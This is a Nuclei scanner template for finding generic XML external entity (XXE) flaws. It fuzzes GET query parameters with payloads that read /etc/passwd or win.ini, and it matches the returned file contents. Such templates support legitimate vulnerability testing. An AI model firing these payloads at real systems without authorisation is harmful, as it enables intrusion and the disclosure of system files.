id: generic-xxe

info:
  name: Generic XML external entity (XXE)
  author: pwnhxl
  severity: medium
  reference:
    - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
  tags: dast,xxe

variables:
  rletter: "{{rand_base(6,'abc')}}"

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      xxe:
        - '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:///c:/windows/win.ini"> ]><x>&{{rletter}};</x>'
        - '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:////etc/passwd"> ]><x>&{{rletter}};</x>'

    fuzzing:
      - part: query
        keys-regex:
          - "(.*?)xml(.*?)"
        fuzz:
          - "{{xxe}}"

      - part: query
        values:
          - "(<!DOCTYPE|<?xml|%3C!DOCTYPE|%3C%3Fxml)(.*?)>"
        fuzz:
          - "{{xxe}}"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: regex
        name: linux
        part: body
        regex:
          - 'root:.*?:[0-9]*:[0-9]*:'

      - type: word
        name: windows
        part: body
        words:
          - 'for 16-bit app support'
# digest: 490a00463044022057ed734a899a6e84282567122e7cbd55d596db47869a9f1079fdda8222765cdd02206129d4a12c906388ae43c37e4048a1913371fc637748eaaefc1356dbae82d139:922c64590222798bb761d5b6d8e72950